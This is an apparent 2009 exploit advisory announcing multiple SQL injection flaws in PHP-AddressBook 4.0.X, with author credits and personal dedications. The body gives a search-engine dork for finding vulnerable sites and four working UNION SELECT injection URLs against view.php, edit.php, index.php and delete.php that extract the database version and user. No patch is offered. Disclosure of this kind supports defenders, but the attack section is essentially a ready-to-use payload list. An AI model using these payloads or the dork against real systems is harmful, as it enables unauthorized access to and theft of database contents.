-------------------------------------------------------------------- MULTIPLE SQL INJECTION VULNERABILITIES --PHP-AddressBook v-4.0.X--> -------------------------------------------------------------------- CMS INFORMATION: -->WEB: http://sourceforge.net/projects/php-addressbook/ -->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/ -->DEMO: http://php-addressbook.sourceforge.net/demo/ -->CATEGORY: Address Book -->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer. Manage groups, addresses, e-Mails, phone numbers & birthdays... -->RELEASED: 2009-06-13 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "php-addressbook" -->CATEGORY: SQL INJECTION -->AFFECT VERSION: 4.0.X -->Discovered Bug date: 2009-06-16 -->Reported Bug date: 2009-06-16 -->Fixed bug date: N/A -->Info patch (????): N/A -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest). ##################### //////////////////// SQL INJECTION VULN: //////////////////// #################### ----------- EXPLOITS: ----------- <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> [++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23 [++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23 [++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23 <<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> [++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23 ------------- WATCH VIDEO: ------------ SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo